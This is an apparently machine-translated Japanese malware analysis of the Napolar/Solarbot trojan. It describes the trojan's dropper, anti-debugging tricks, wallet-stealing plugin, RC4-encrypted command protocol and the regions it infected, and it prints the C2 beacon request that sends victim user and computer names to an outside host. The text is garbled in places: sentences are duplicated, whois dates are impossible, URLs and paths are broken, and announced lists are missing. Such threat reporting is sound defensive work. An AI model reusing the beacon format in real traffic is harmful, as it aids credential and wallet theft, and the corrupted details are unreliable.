Win32/64:Napolarトロイの木馬の場合、プロセス間通信パイプの名前は「 \pipe apSolar 」です。\CHROME.DLL」、「OPERA.DLL」、「trusteer」、「data_inject」などの文字列が存在します。DLL"、"OPERA.DLL"、"trusteer"、"data_inject "などの文字列や、後述する機能から、Solarbotと何らかの関係があると判断されました。以下、分析結果を見てみましょう。
ドロッパー
このファイルは最初、Photo_021-WWW.FACEBOOK.COM.exeのような名前の自己解凍型zipファイルとして存在し、ドロッパーの無言実行と、下のようなセクシーな女の子の写真の表示の2つのタスクを実行します:
コア実行ファイルの構造は以下の通りです:
最初のx86部分は、システムのアーキテクチャを識別するためにも使用されます。LDE64(Length Disassembly Engine)は、BeaEngine配下の32ビットベースの公式ツールで、32ビットおよび64ビットアーキテクチャの命令デコードが可能です。逆アセンブル作業は、システム機能の変更に不可欠です。
ウェブサイトで宣伝されているように、KERNEL32.DLL、NTDLL.DLL、WININET.DLL、SHLWAPI.DLL、PASPI.DLLの重要な関数はすべてCRC32ハッシュ化され、仮想フォームに格納されます。IsDebuggerPresent、OutputDebugString関数に関連するアンチデバッグのトリックもここに表現されています。%AppDatalsass.exeにインストールされると、新しく要求されたメモリ空間0xFE0000で実行が開始され、その後ボットはそれ自体をシャットダウンします。
このトロイの木馬に感染した領域の分布を理解するために、関連する検出セクションの動作を分析しました。その結果、少なくとも毎日数百台のコンピュータが感染しており、これは Solarbot の総サンプル数よりもわずかに多いことがわかりました。感染の影響を最も受けている地域は、中南米のコロンビア、ベネズエラ、ペルー、メキシコ、アルゼンチン、アジアのフィリピン、ベトナム、ヨーロッパのポーランドです。
プロトコル
ドメイン名:SOLARBOT.NET
レジストラ: NETEARTH ONE INC.
Whoisサーバー: whois.advancedregistrar.com
参照URL:http://..om
ネームサーバー: NS1.BITCOIN-DNS.COM
ネームサーバー: NS2.BITCOIN-DNS.COM
ステータス: clientTransferProhibited
更新日: 01-aug-1023
作成日: 01-aug-1023
有効期限: 01-aug-1024
登録データの連絡先情報はPRIVACYPROTECT.ORGの背後に隠されており、悪意のある活動に関与する多数のグループを引き寄せています。
実行コマンドを取得するためのHTTP POSTリクエストを以下に示します:
POST / HTTP/.1
Content-Type: application/x-www-form-urlencoded
ユーザーエージェント:Mozilla/4.0
ホスト: www.paloshke.org
コンテンツ長: 81
Pragma: no-cache
v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32
ここで、sは被害者の環境から取得し、その後生成されたRC4復号鍵を表し、vはボットのバージョンを表し、数字1.0はボットの初期開発段階を表します。
リクエストに成功すると、レスポンスを受信します。前述のように、これはRC4で暗号化され、暗号化されていない正しい鍵がPOSTクエリフィールドを介して送信されます。レスポンスの構造は 0 で分割された文字列の配列の形をしています。接続遅延の場合は秒数、ダウンロードコマンドの場合はファイルのURLアドレス、制御ハッシュ、復号化キー、0×2コマンドはビットコインウォレットを盗むプラグインである追加ファイルWalletSteal.binをインストールします。bitcoin.orgによると、ビットコインウォレットとはビットコインネットワークにおける物理的な財布に相当するもので、ユーザーがビットコイン取引で使用するための鍵が格納されています。実際、これはプラグインのサポートについて言われていることの一例です。プラグインの暗号化は%AppData内の一時ディレクトリSlrPluginに置かれます。
機能
ウェブサイトで紹介されている機能は以下の通りです:
FTPとPOP3のスキミング、逆Socks5または基本機能モジュールの実装が見られます。ブラウザからの攻撃の可能性を反映する関連文字列があります。実際、Cyberbanking Forumのコンテンツが暗号化されていない方法でC&Cサーバに送信されていることが判明しましたが、これはサイトがレピュテーションや証明書の検証を要求した場合にのみ発生しました。これは、以下の組み込みURLのリストに関連している可能性があります:
そして、内部コマンド 0xF を介してリモートで更新されます。
最後に、このボットが示す強力な悪意のある能力は、200ドルというリーズナブルな価格と相まって、近い将来拡散する可能性が高いと言わざるを得ません。幸いなことに、アンチウィルス・ソフトウェアが利用できるようになるため、この種のサイバー犯罪者が生き残るのはさらに難しくなるでしょう。
ソースコード
AVASTエンジンにおける選択されたサンプルとカバレッジのSHA256ハッシュ:
